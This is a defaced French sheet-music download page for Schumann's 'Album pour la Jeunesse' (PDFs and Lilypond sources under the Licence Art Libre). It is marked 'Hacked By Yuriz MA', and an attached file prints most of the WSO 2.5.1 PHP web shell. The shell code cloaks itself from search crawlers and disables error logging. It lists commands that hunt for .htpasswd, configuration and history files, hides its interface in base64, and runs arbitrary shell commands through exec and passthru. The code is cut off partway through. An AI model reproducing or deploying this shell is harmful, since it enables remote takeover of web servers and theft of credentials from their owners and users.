Hacked By Yuriz MA
Accueil du site > X. Téléchargements. > 5. Schumann - Album pour la Jeunesse. > Robert Schumann - Album pour la Jeunesse : pdfs et sources (GNU Lilypond - (...)

Robert Schumann - Album pour la Jeunesse : pdfs et sources (GNU Lilypond - License Art Libre)


Toutes ces publications ainsi que leurs sources sont éditées selon les termes de la Licence Art Libre, voir :

http://www.artlibre.org/licence/lal/ (en, de, es, pt, it)


EN FRANÇAIS

  • Version 1 : AVEC DOIGTÉS. (Le 09/05/2012)

Le pdf AVEC DOIGTÉS de l’Album de la Jeunesse :

PDF - 1.3 Mo
Schumann-Album-pour-la-Jeunesse-avec-doigtes.pdf
Version 1 : Le 09/Mai/2012
  • Version 1 : SANS DOIGTÉS. (Le 09/05/2012)

Le pdf SANS DOIGTÉS de l’Album de la Jeunesse :

PDF - 1.2 Mo
Schumann-Album-pour-la-Jeunesse-Sans-Doigtes.pdf
Version 1 : Le 09/Mai/2012

EN ALLEMAND

  • UPDATE Version 1.1 : MIT FINGERSATZ. (Le 10/05/2012)

Le pdf Album für die Jugend-MIT FINGERSATZ :

PDF - 1.3 Mo
Schumann-Album-fur-die-Jugend-mit-Fingersatz.pdf
UPDATE Version1.1 : Le 10/Mai/2012
  • UPDATE Version 1.1 : OHNE FINGERSATZ. (Le 10/05/2012)

Le pdf Album für die Jugend-OHNE FINGERSATZ :

PDF - 1.2 Mo
Schumann-Album-fur-die-Jugend-ohne-Fingersatz.pdf
UPDATE Version1.1 : Le 10/Mai/2012

Les sources Lilypond+midi intégrées dans les pdfs sont au format tar.bz2. En cas de problème avec le désarchivage de ce format (sur Windows ou Mac), les voici au format zip.

Zip - 203 ko
Schumann-Album-pour-la-Jeunesse-sources-ly_midis.zip
Version 1 : Le 09/Mai/2012

Documents joints

  • shell sonix (Binary Data - 66.1 ko)

    <?php

    $color 
    "#df5";
    $default_action 'FilesMan';
    $default_use_ajax true;
    $default_charset 'Windows-1251';

    if(!empty(
    $_SERVER['HTTP_USER_AGENT'])) {
        
    $userAgents = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler");
        if(
    preg_match('/' implode('|'$userAgents) . '/i'$_SERVER['HTTP_USER_AGENT'])) {
            
    header('HTTP/1.0 404 Not Found');
            exit;
        }
    }

    @
    ini_set('error_log',NULL);
    @
    ini_set('log_errors',0);
    @
    ini_set('max_execution_time',0);
    @
    set_time_limit(0);
    @
    set_magic_quotes_runtime(0);
    @
    define('WSO_VERSION''2.5.1');

    if(
    get_magic_quotes_gpc()) {
        function 
    WSOstripslashes($array) {
            return 
    is_array($array) ? array_map('WSOstripslashes'$array) : stripslashes($array);
        }
        
    $_POST WSOstripslashes($_POST);
        
    $_COOKIE WSOstripslashes($_COOKIE);
    }

    function 
    wsoLogin() {
        die(
    "<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
    }

    function 
    WSOsetcookie($k$v) {
        
    $_COOKIE[$k] = $v;
        
    setcookie($k$v);
    }

    if(!empty(
    $auth_pass)) {
        if(isset(
    $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

        if (!isset(
    $_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
            
    wsoLogin();
    }

    if(
    strtolower(substr(PHP_OS,0,3)) == "win")
        
    $os 'win';
    else
        
    $os 'nix';

    $safe_mode = @ini_get('safe_mode');
    if(!
    $safe_mode)
        
    error_reporting(0);

    $disable_functions = @ini_get('disable_functions');
    $home_cwd = @getcwd();
    if(isset(
    $_POST['c']))
        @
    chdir($_POST['c']);
    $cwd = @getcwd();
    if(
    $os == 'win') {
        
    $home_cwd str_replace("\\""/"$home_cwd);
        
    $cwd str_replace("\\""/"$cwd);
    }
    if(
    $cwd[strlen($cwd)-1] != '/')
        
    $cwd .= '/';

    if(!isset(
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
        
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

    if(
    $os == 'win')
        
    $aliases = array(
            
    "List Directory" => "dir",
            
    "Find index.php in current dir" => "dir /s /w /b index.php",
            
    "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
            
    "Show active connections" => "netstat -an",
            
    "Show running services" => "net start",
            
    "User accounts" => "net user",
            
    "Show computers" => "net view",
            
    "ARP Table" => "arp -a",
            
    "IP Configuration" => "ipconfig /all"
        
    );
    else
        
    $aliases = array(
              
    "List dir" => "ls -lha",
            
    "list file attributes on a Linux second extended file system" => "lsattr -va",
              
    "show opened ports" => "netstat -an | grep -i listen",
            
    "process status" => "ps aux",
            
    "Find" => "",
              
    "find suid" => "find / -type f -perm -04000 -ls",
              
    "find suid in current dir" => "find . -type f -perm -04000 -ls",
              
    "find sgid" => "find / -type f -perm -02000 -ls",
              
    "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
              
    "find config.inc.php" => "find / -type f -name config.inc.php",
              
    "find config*" => "find / -type f -name \"config*\"",
              
    "find config* in current dir" => "find . -type f -name \"config*\"",
              
    "find writable folders and files" => "find / -perm -2 -ls",
              
    "find writable folders and files in current dir" => "find . -perm -2 -ls",
              
    "find service.pwd" => "find / -type f -name service.pwd",
              
    "find service.pwd files in current dir" => "find . -type f -name service.pwd",
              
    "find .htpasswd" => "find / -type f -name .htpasswd",
              
    "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
              
    "find .bash_history" => "find / -type f -name .bash_history",
              
    "find .bash_history files in current dir" => "find . -type f -name .bash_history",
              
    "find .fetchmailrc" => "find / -type f -name .fetchmailrc",
              
    "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
            
    "Locate" => "",
              
    "locate httpd.conf" => "locate httpd.conf",
            
    "locate vhosts.conf" => "locate vhosts.conf",
            
    "locate proftpd.conf" => "locate proftpd.conf",
            
    "locate psybnc.conf" => "locate psybnc.conf",
            
    "locate my.conf" => "locate my.conf",
            
    "locate admin.php" =>"locate admin.php",
            
    "locate cfg.php" => "locate cfg.php",
            
    "locate conf.php" => "locate conf.php",
            
    "locate config.dat" => "locate config.dat",
            
    "locate config.php" => "locate config.php",
            
    "locate config.inc" => "locate config.inc",
            
    "locate config.inc.php" => "locate config.inc.php",
            
    "locate config.default.php" => "locate config.default.php",
            
    "locate config*" => "locate config",
            
    "locate .conf"=>"locate '.conf'",
            
    "locate .pwd" => "locate '.pwd'",
            
    "locate .sql" => "locate '.sql'",
            
    "locate .htpasswd" => "locate '.htpasswd'",
            
    "locate .bash_history" => "locate '.bash_history'",
            
    "locate .mysql_history" => "locate '.mysql_history'",
            
    "locate .fetchmailrc" => "locate '.fetchmailrc'",
            
    "locate backup" => "locate backup",
            
    "locate dump" => "locate dump",
            
    "locate priv" => "locate priv"
        
    );

    function 
    wsoHeader() {
        if(empty(
    $_POST['charset']))
            
    $_POST['charset'] = $GLOBALS['default_charset'];
        global 
    $color;
        echo 
    "<div class="base64" title="PGhlYWQ+PG1ldGEgaHR0cC1lcXVpdj0nQ29udGVudC1UeXBlJyBjb250ZW50PSd0ZXh0L2h0bWw7IGNoYXJzZXQ9IiAuICRfUE9TVFsnY2hhcnNldCddIC4gIic+PHRpdGxlPiIgLiAkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiAiIC0gV1NPICIgLiBXU09fVkVSU0lPTiAuIjwvdGl0bGU+CjxzdHlsZT4KYm9keXtiYWNrZ3JvdW5kLWNvbG9yOiM0NDQ7Y29sb3I6I2UxZTFlMTt9CmJvZHksdGQsdGh7IGZvbnQ6IDlwdCBMdWNpZGEsVmVyZGFuYTttYXJnaW46MDt2ZXJ0aWNhbC1hbGlnbjp0b3A7Y29sb3I6I2UxZTFlMTsgfQp0YWJsZS5pbmZveyBjb2xvcjojZmZmO2JhY2tncm91bmQtY29sb3I6IzIyMjsgfQpzcGFuLGgxLGF7IGNvbG9yOiAkY29sb3IgIWltcG9ydGFudDsgfQpzcGFueyBmb250LXdlaWdodDogYm9sZGVyOyB9CmgxeyBib3JkZXItbGVmdDo1cHggc29saWQgJGNvbG9yO3BhZGRpbmc6IDJweCA1cHg7Zm9udDogMTRwdCBWZXJkYW5hO2JhY2tncm91bmQtY29sb3I6IzIyMjttYXJnaW46MHB4OyB9CmRpdi5jb250ZW50eyBwYWRkaW5nOiA1cHg7bWFyZ2luLWxlZnQ6NXB4O2JhY2tncm91bmQtY29sb3I6IzMzMzsgfQpheyB0ZXh0LWRlY29yYXRpb246bm9uZTsgfQphOmhvdmVyeyB0ZXh0LWRlY29yYXRpb246dW5kZXJsaW5lOyB9Ci5tbDF7IGJvcmRlcjoxcHggc29saWQgIzQ0NDtwYWRkaW5nOjVweDttYXJnaW46MDtvdmVyZmxvdzogYXV0bzsgfQouYmlnYXJlYXsgd2lkdGg6MTAwJTtoZWlnaHQ6MzAwcHg7IH0KaW5wdXQsdGV4dGFyZWEsc2VsZWN0eyBtYXJnaW46MDtjb2xvcjojZmZmO2JhY2tncm91bmQtY29sb3I6IzU1NTtib3JkZXI6MXB4IHNvbGlkICRjb2xvcjsgZm9udDogOXB0IE1vbm9zcGFjZSwnQ291cmllciBOZXcnOyB9CmZvcm17IG1hcmdpbjowcHg7IH0KI3Rvb2xzVGJseyB0ZXh0LWFsaWduOmNlbnRlcjsgfQoudG9vbHNJbnB7IHdpZHRoOiAzMDBweCB9Ci5tYWluIHRoe3RleHQtYWxpZ246bGVmdDtiYWNrZ3JvdW5kLWNvbG9yOiM1ZTVlNWU7fQoubWFpbiB0cjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiM1ZTVlNWV9Ci5sMXtiYWNrZ3JvdW5kLWNvbG9yOiM0NDR9Ci5sMntiYWNrZ3JvdW5kLWNvbG9yOiMzMzN9CnByZXtmb250LWZhbWlseTpDb3VyaWVyLE1vbm9zcGFjZTt9Cjwvc3R5bGU+CjxzY3JpcHQ+CiAgICB2YXIgY18gPSAnIiAuIGh0bWxzcGVjaWFsY2hhcnMoJEdMT0JBTFNbJ2N3ZCddKSAuICInOwogICAgdmFyIGFfID0gJyIgLiBodG1sc3BlY2lhbGNoYXJzKEAkX1BPU1RbJ2EnXSkgLiInCiAgICB2YXIgY2hhcnNldF8gPSAnIiAuIGh0bWxzcGVjaWFsY2hhcnMoQCRfUE9TVFsnY2hhcnNldCddKSAuIic7CiAgICB2YXIgcDFfID0gJyIgLiAoKHN0cnBvcyhAJF9QT1NUWydwMSddLCJcbiIpIT09ZmFsc2UpPycnOmh0bWxzcGVjaWFsY2hhcnMoJF9QT1NUWydwMSddLEVOVF9RVU9URVMpKSAuIic7CiAgICB2YXIgcDJfID0gJyIgLiAoKHN0cnBvcyhAJF9QT1NUWydwMiddLCJcbiIpIT09ZmFsc2UpPycnOmh0bWxzcGVjaWFsY2hhcnMoJF9QT1NUWydwMiddLEVOVF9RVU9URVMpKSAuIic7CiAgICB2YXIgcDNfID0gJyIgLiAoKHN0cnBvcyhAJF9QT1NUWydwMyddLCJcbiIpIT09ZmFsc2UpPycnOmh0bWxzcGVjaWFsY2hhcnMoJF9QT1NUWydwMyddLEVOVF9RVU9URVMpKSAuIic7CiAgICB2YXIgZCA9IGRvY3VtZW50OwoJZnVuY3Rpb24gc2V0KGEsYyxwMSxwMixwMyxjaGFyc2V0KSB7CgkJaWYoYSE9bnVsbClkLm1mLmEudmFsdWU9YTtlbHNlIGQubWYuYS52YWx1ZT1hXzsKCQlpZihjIT1udWxsKWQubWYuYy52YWx1ZT1jO2Vsc2UgZC5tZi5jLnZhbHVlPWNfOwoJCWlmKHAxIT1udWxsKWQubWYucDEudmFsdWU9cDE7ZWxzZSBkLm1mLnAxLnZhbHVlPXAxXzsKCQlpZihwMiE9bnVsbClkLm1mLnAyLnZhbHVlPXAyO2Vsc2UgZC5tZi5wMi52YWx1ZT1wMl87CgkJaWYocDMhPW51bGwpZC5tZi5wMy52YWx1ZT1wMztlbHNlIGQubWYucDMudmFsdWU9cDNfOwoJCWlmKGNoYXJzZXQhPW51bGwpZC5tZi5jaGFyc2V0LnZhbHVlPWNoYXJzZXQ7ZWxzZSBkLm1mLmNoYXJzZXQudmFsdWU9Y2hhcnNldF87Cgl9CglmdW5jdGlvbiBnKGEsYyxwMSxwMixwMyxjaGFyc2V0KSB7CgkJc2V0KGEsYyxwMSxwMixwMyxjaGFyc2V0KTsKCQlkLm1mLnN1Ym1pdCgpOwoJfQoJZnVuY3Rpb24gYShhLGMscDEscDIscDMsY2hhcnNldCkgewoJCXNldChhLGMscDEscDIscDMsY2hhcnNldCk7CgkJdmFyIHBhcmFtcyA9ICdhamF4PXRydWUnOwoJCWZvcihpPTA7aTxkLm1mLmVsZW1lbnRzLmxlbmd0aDtpKyspCgkJCXBhcmFtcyArPSAnJicrZC5tZi5lbGVtZW50c1tpXS5uYW1lKyc9JytlbmNvZGVVUklDb21wb25lbnQoZC5tZi5lbGVtZW50c1tpXS52YWx1ZSk7CgkJc3IoJyIgLiBhZGRzbGFzaGVzKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIicsIHBhcmFtcyk7Cgl9CglmdW5jdGlvbiBzcih1cmwsIHBhcmFtcykgewoJCWlmICh3aW5kb3cuWE1MSHR0cFJlcXVlc3QpCgkJCXJlcSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwoJCWVsc2UgaWYgKHdpbmRvdy5BY3RpdmVYT2JqZWN0KQoJCQlyZXEgPSBuZXcgQWN0aXZlWE9iamVjdCgnTWljcm9zb2Z0LlhNTEhUVFAnKTsKICAgICAgICBpZiAocmVxKSB7CiAgICAgICAgICAgIHJlcS5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBwcm9jZXNzUmVxQ2hhbmdlOwogICAgICAgICAgICByZXEub3BlbignUE9TVCcsIHVybCwgdHJ1ZSk7CiAgICAgICAgICAgIHJlcS5zZXRSZXF1ZXN0SGVhZGVyICgnQ29udGVudC1UeXBlJywgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpOwogICAgICAgICAgICByZXEuc2VuZChwYXJhbXMpOwogICAgICAgIH0KCX0KCWZ1bmN0aW9uIHByb2Nlc3NSZXFDaGFuZ2UoKSB7CgkJaWYoIChyZXEucmVhZHlTdGF0ZSA9PSA0KSApCgkJCWlmKHJlcS5zdGF0dXMgPT0gMjAwKSB7CgkJCQl2YXIgcmVnID0gbmV3IFJlZ0V4cChcIihcXFxcZCspKFtcXFxcU1xcXFxzXSopXCIsICdtJyk7CgkJCQl2YXIgYXJyPXJlZy5leGVjKHJlcS5yZXNwb25zZVRleHQpOwoJCQkJZXZhbChhcnJbMl0uc3Vic3RyKDAsIGFyclsxXSkpOwoJCQl9IGVsc2UgYWxlcnQoJ1JlcXVlc3QgZXJyb3IhJyk7Cgl9Cjwvc2NyaXB0Pgo8aGVhZD48Ym9keT48ZGl2IHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTt3aWR0aDoxMDAlO2JhY2tncm91bmQtY29sb3I6IzQ0NDt0b3A6MDtsZWZ0OjA7Jz4KPGZvcm0gbWV0aG9kPXBvc3QgbmFtZT1tZiBzdHlsZT0nZGlzcGxheTpub25lOyc+CjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWE+CjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWM+CjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPXAxPgo8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1wMj4KPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9cDM+CjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWNoYXJzZXQ+CjwvZm9ybT4iOwoJJGZyZWVTcGFjZSA9IEBkaXNrZnJlZXNwYWNlKCRHTE9CQUxTWydjd2QnXSk7CgkkdG90YWxTcGFjZSA9IEBkaXNrX3RvdGFsX3NwYWNlKCRHTE9CQUxTWydjd2QnXSk7CgkkdG90YWxTcGFjZSA9ICR0b3RhbFNwYWNlPyR0b3RhbFNwYWNlOjE7CgkkcmVsZWFzZSA9IEBwaHBfdW5hbWUoJ3InKTsKCSRrZXJuZWwgPSBAcGhwX3VuYW1lKCdzJyk7CgkkZXhwbGluayA9ICdodHRwOi8vZXhwbG9pdC1kYi5jb20vc2VhcmNoLz9hY3Rpb249c2VhcmNoJmZpbHRlcl9kZXNjcmlwdGlvbj0nOwoJaWYoc3RycG9zKCdMaW51eCcsICRrZXJuZWwpICE9PSBmYWxzZSkKCQkkZXhwbGluayAuPSB1cmxlbmNvZGUoJ0xpbnV4IEtlcm5lbCAnIC4gc3Vic3RyKCRyZWxlYXNlLDAsNikpOwoJZWxzZQoJCSRleHBsaW5rIC49IHVybGVuY29kZSgka2VybmVsIC4gJyAnIC4gc3Vic3RyKCRyZWxlYXNlLDAsMykpOwoJaWYoIWZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKSB7CgkJJHVzZXIgPSBAZ2V0X2N1cnJlbnRfdXNlcigpOwoJCSR1aWQgPSBAZ2V0bXl1aWQoKTsKCQkkZ2lkID0gQGdldG15Z2lkKCk7CgkJJGdyb3VwID0gIj8iOwoJfSBlbHNlIHsKCQkkdWlkID0gQHBvc2l4X2dldHB3dWlkKHBvc2l4X2dldGV1aWQoKSk7CgkJJGdpZCA9IEBwb3NpeF9nZXRncmdpZChwb3NpeF9nZXRlZ2lkKCkpOwoJCSR1c2VyID0gJHVpZFsnbmFtZSddOwoJCSR1aWQgPSAkdWlkWyd1aWQnXTsKCQkkZ3JvdXAgPSAkZ2lkWyduYW1lJ107CgkJJGdpZCA9ICRnaWRbJ2dpZCddOwoJfQoKCSRjd2RfbGlua3MgPSAnJzsKCSRwYXRoID0gZXhwbG9kZSgiLyIsICRHTE9CQUxTWydjd2QnXSk7Cgkkbj1jb3VudCgkcGF0aCk7Cglmb3IoJGk9MDsgJGk8JG4tMTsgJGkrKykgewoJCSRjd2RfbGlua3MgLj0gIjxhIGhyZWY9JyMnIG9uY2xpY2s9J2coXCJGaWxlc01hblwiLFwiIjsKCQlmb3IoJGo9MDsgJGo8PSRpOyAkaisrKQoJCQkkY3dkX2xpbmtzIC49ICRwYXRoWyRqXS4nLyc7CgkJJGN3ZF9saW5rcyAuPSAiXCIpJz4iLiRwYXRoWyRpXS4iLzwvYT4iOwoJfQoKCSRjaGFyc2V0cyA9IGFycmF5KCdVVEYtOCcsICdXaW5kb3dzLTEyNTEnLCAnS09JOC1SJywgJ0tPSTgtVScsICdjcDg2NicpOwoJJG9wdF9jaGFyc2V0cyA9ICcnOwoJZm9yZWFjaCgkY2hhcnNldHMgYXMgJGl0ZW0pCgkJJG9wdF9jaGFyc2V0cyAuPSAnPG9wdGlvbiB2YWx1ZT0iJy4kaXRlbS4nIiAnLigkX1BPU1RbJ2NoYXJzZXQnXT09JGl0ZW0/J3NlbGVjdGVkJzonJykuJz4nLiRpdGVtLic8L29wdGlvbj4nOwoKCSRtID0gYXJyYXkoJ1NlYy4gSW5mbyc9PidTZWNJbmZvJywnRmlsZXMnPT4nRmlsZXNNYW4nLCdDb25zb2xlJz0+J0NvbnNvbGUnLCdTcWwnPT4nU3FsJywnUGhwJz0+J1BocCcsJ1N0cmluZyB0b29scyc9PidTdHJpbmdUb29scycsJ0JydXRlZm9yY2UnPT4nQnJ1dGVmb3JjZScsJ05ldHdvcmsnPT4nTmV0d29yaycpOwoJaWYoIWVtcHR5KCRHTE9CQUxTWydhdXRoX3Bhc3MnXSkpCgkJJG1bJ0xvZ291dCddID0gJ0xvZ291dCc7CgkkbVsnU2VsZiByZW1vdmUnXSA9ICdTZWxmUmVtb3ZlJzsKCSRtZW51ID0gJyc7Cglmb3JlYWNoKCRtIGFzICRrID0+ICR2KQoJCSRtZW51IC49ICc8dGggd2lkdGg9IicuKGludCkoMTAwL2NvdW50KCRtKSkuJyUiPlsgPGEgaHJlZj0iIyIgb25jbGljaz0iZyhcJycuJHYuJ1wnLG51bGwsXCdcJyxcJ1wnLFwnXCcpIj4nLiRrLic8L2E+IF08L3RoPic7CgoJJGRyaXZlcyA9ICIiOwoJaWYoJEdMT0JBTFNbJ29zJ10gPT0gJ3dpbicpIHsKCQlmb3JlYWNoKHJhbmdlKCdjJywneicpIGFzICRkcml2ZSkKCQlpZihpc19kaXIoJGRyaXZlLic6XFwnKSkKCQkJJGRyaXZlcyAuPSAnPGEgaHJlZj0iIyIgb25jbGljaz0iZyhcJ0ZpbGVzTWFuXCcsXCcnLiRkcml2ZS4nOi9cJykiPlsgJy4kZHJpdmUuJyBdPC9hPiAnOwoJfQoJZWNobyAnPHRhYmxlIGNsYXNzPWluZm8gY2VsbHBhZGRpbmc9MyBjZWxsc3BhY2luZz0wIHdpZHRoPTEwMCU+PHRyPjx0ZCB3aWR0aD0xPjxzcGFuPlVuYW1lOjxicj5Vc2VyOjxicj5QaHA6PGJyPkhkZDo8YnI+Q3dkOicgLiAoJEdMT0JBTFNbJ29zJ10gPT0gJ3dpbic/Jzxicj5Ecml2ZXM6JzonJykgLiAnPC9zcGFuPjwvdGQ+JwogICAgICAgLiAnPHRkPjxub2JyPicgLiBzdWJzdHIoQHBocF91bmFtZSgpLCAwLCAxMjApIC4gJyA8YSBocmVmPSInIC4gJGV4cGxpbmsgLiAnIiB0YXJnZXQ9X2JsYW5rPltleHBsb2l0LWRiLmNvbV08L2E+PC9ub2JyPjxicj4nIC4gJHVpZCAuICcgKCAnIC4gJHVzZXIgLiAnICkgPHNwYW4+R3JvdXA6PC9zcGFuPiAnIC4gJGdpZCAuICcgKCAnIC4gJGdyb3VwIC4gJyApPGJyPicgLiBAcGhwdmVyc2lvbigpIC4gJyA8c3Bhbj5TYWZlIG1vZGU6PC9zcGFuPiAnIC4gKCRHTE9CQUxTWydzYWZlX21vZGUnXT8nPGZvbnQgY29sb3I9cmVkPk9OPC9mb250Pic6Jzxmb250IGNvbG9yPWdyZWVuPjxiPk9GRjwvYj48L2ZvbnQ+JykKICAgICAgIC4gJyA8YSBocmVmPSMgb25jbGljaz0iZyhcJ1BocFwnLG51bGwsXCdcJyxcJ2luZm9cJykiPlsgcGhwaW5mbyBdPC9hPiA8c3Bhbj5EYXRldGltZTo8L3NwYW4+ICcgLiBkYXRlKCdZLW0tZCBIOmk6cycpIC4gJzxicj4nIC4gd3NvVmlld1NpemUoJHRvdGFsU3BhY2UpIC4gJyA8c3Bhbj5GcmVlOjwvc3Bhbj4gJyAuIHdzb1ZpZXdTaXplKCRmcmVlU3BhY2UpIC4gJyAoJy4gKGludCkgKCRmcmVlU3BhY2UvJHRvdGFsU3BhY2UqMTAwKSAuICclKTxicj4nIC4gJGN3ZF9saW5rcyAuICcgJy4gd3NvUGVybXNDb2xvcigkR0xPQkFMU1snY3dkJ10pIC4gJyA8YSBocmVmPSMgb25jbGljaz0iZyhcJ0ZpbGVzTWFuXCcsXCcnIC4gJEdMT0JBTFNbJ2hvbWVfY3dkJ10gLiAnXCcsXCdcJyxcJ1wnLFwnXCcpIj5bIGhvbWUgXTwvYT48YnI+JyAuICRkcml2ZXMgLiAnPC90ZD4nCiAgICAgICAuICc8dGQgd2lkdGg9MSBhbGlnbj1yaWdodD48bm9icj48c2VsZWN0IG9uY2hhbmdlPSJnKG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCx0aGlzLnZhbHVlKSI+PG9wdGdyb3VwIGxhYmVsPSJQYWdlIGNoYXJzZXQiPicgLiAkb3B0X2NoYXJzZXRzIC4gJzwvb3B0Z3JvdXA+PC9zZWxlY3Q+PGJyPjxzcGFuPlNlcnZlciBJUDo8L3NwYW4+PGJyPicgLiBAJF9TRVJWRVJbIlNFUlZFUl9BRERSIl0gLiAnPGJyPjxzcGFuPkNsaWVudCBJUDo8L3NwYW4+PGJyPicgLiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXSAuICc8L25vYnI+PC90ZD48L3RyPjwvdGFibGU+JwogICAgICAgLiAnPHRhYmxlIHN0eWxlPSJib3JkZXItdG9wOjJweCBzb2xpZCAjMzMzOyIgY2VsbHBhZGRpbmc9MyBjZWxsc3BhY2luZz0wIHdpZHRoPTEwMCU+PHRyPicgLiAkbWVudSAuICc8L3RyPjwvdGFibGU+PGRpdiBzdHlsZT0ibWFyZ2luOjUiPic7Cn0KCmZ1bmN0aW9uIHdzb0Zvb3RlcigpIHsKCSRpc193cml0YWJsZSA9IGlzX3dyaXRhYmxlKCRHTE9CQUxTWydjd2QnXSk/IiA8Zm9udCBjb2xvcj0nZ3JlZW4nPihXcml0ZWFibGUpPC9mb250PiI6IiA8Zm9udCBjb2xvcj1yZWQ+KE5vdCB3cml0YWJsZSk8L2ZvbnQ+IjsKICAgIGVjaG8gIgo8L2Rpdj4KPHRhYmxlIGNsYXNzPWluZm8gaWQ9dG9vbHNUYmwgY2VsbHBhZGRpbmc9MyBjZWxsc3BhY2luZz0wIHdpZHRoPTEwMCUgIHN0eWxlPSdib3JkZXItdG9wOjJweCBzb2xpZCAjMzMzO2JvcmRlci1ib3R0b206MnB4IHNvbGlkICMzMzM7Jz4KCTx0cj4KCQk8dGQ+PGZvcm0gb25zdWJtaXQ9J2cobnVsbCx0aGlzLmMudmFsdWUsXCJcIik7cmV0dXJuIGZhbHNlOyc+PHNwYW4+Q2hhbmdlIGRpcjo8L3NwYW4+PGJyPjxpbnB1dCBjbGFzcz0ndG9vbHNJbnAnIHR5cGU9dGV4dCBuYW1lPWMgdmFsdWU9JyIgLiBodG1sc3BlY2lhbGNoYXJzKCRHTE9CQUxTWydjd2QnXSkgLiInPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nPj4nPjwvZm9ybT48L3RkPgoJCTx0ZD48Zm9ybSBvbnN1Ym1pdD1cImcoJ0ZpbGVzVG9vbHMnLG51bGwsdGhpcy5mLnZhbHVlKTtyZXR1cm4gZmFsc2U7XCI+PHNwYW4+UmVhZCBmaWxlOjwvc3Bhbj48YnI+PGlucHV0IGNsYXNzPSd0b29sc0lucCcgdHlwZT10ZXh0IG5hbWU9Zj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz48L2Zvcm0+PC90ZD4KCTwvdHI+PHRyPgoJCTx0ZD48Zm9ybSBvbnN1Ym1pdD1cImcoJ0ZpbGVzTWFuJyxudWxsLCdta2RpcicsdGhpcy5kLnZhbHVlKTtyZXR1cm4gZmFsc2U7XCI+PHNwYW4+TWFrZSBkaXI6PC9zcGFuPiRpc193cml0YWJsZTxicj48aW5wdXQgY2xhc3M9J3Rvb2xzSW5wJyB0eXBlPXRleHQgbmFtZT1kPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nPj4nPjwvZm9ybT48L3RkPgoJCTx0ZD48Zm9ybSBvbnN1Ym1pdD1cImcoJ0ZpbGVzVG9vbHMnLG51bGwsdGhpcy5mLnZhbHVlLCdta2ZpbGUnKTtyZXR1cm4gZmFsc2U7XCI+PHNwYW4+TWFrZSBmaWxlOjwvc3Bhbj4kaXNfd3JpdGFibGU8YnI+PGlucHV0IGNsYXNzPSd0b29sc0lucCcgdHlwZT10ZXh0IG5hbWU9Zj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz48L2Zvcm0+PC90ZD4KCTwvdHI+PHRyPgoJCTx0ZD48Zm9ybSBvbnN1Ym1pdD1cImcoJ0NvbnNvbGUnLG51bGwsdGhpcy5jLnZhbHVlKTtyZXR1cm4gZmFsc2U7XCI+PHNwYW4+RXhlY3V0ZTo8L3NwYW4+PGJyPjxpbnB1dCBjbGFzcz0ndG9vbHNJbnAnIHR5cGU9dGV4dCBuYW1lPWMgdmFsdWU9Jyc+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pic+PC9mb3JtPjwvdGQ+CgkJPHRkPjxmb3JtIG1ldGhvZD0ncG9zdCcgRU5DVFlQRT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+CgkJPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YSB2YWx1ZT0nRmlsZXNNQW4nPgoJCTxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWMgdmFsdWU9JyIgLiAkR0xPQkFMU1snY3dkJ10gLiInPgoJCTxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPXAxIHZhbHVlPSd1cGxvYWRGaWxlJz4KCQk8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1jaGFyc2V0IHZhbHVlPSciIC4gKGlzc2V0KCRfUE9TVFsnY2hhcnNldCddKT8kX1BPU1RbJ2NoYXJzZXQnXTonJykgLiAiJz4KCQk8c3Bhbj5VcGxvYWQgZmlsZTo8L3NwYW4+JGlzX3dyaXRhYmxlPGJyPjxpbnB1dCBjbGFzcz0ndG9vbHNJbnAnIHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pic+PC9mb3JtPjxiciAgPjwvdGQ+Cgk8L3RyPjwvdGFibGU+PC9kaXY+PC9ib2R5Pg=="></div>

    "
    ;
    }

    if (!
    function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
        function 
    posix_getpwuid($p) {return false;} }
    if (!
    function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
        function 
    posix_getgrgid($p) {return false;} }

    function 
    wsoEx($in) {
        
    $out '';
        if (
    function_exists('exec')) {
            @
    exec($in,$out);
            
    $out = @join("\n",$out);
        } elseif (
    function_exists('passthru')) {
            
    ob_start();
            @
    passthru($in);
            
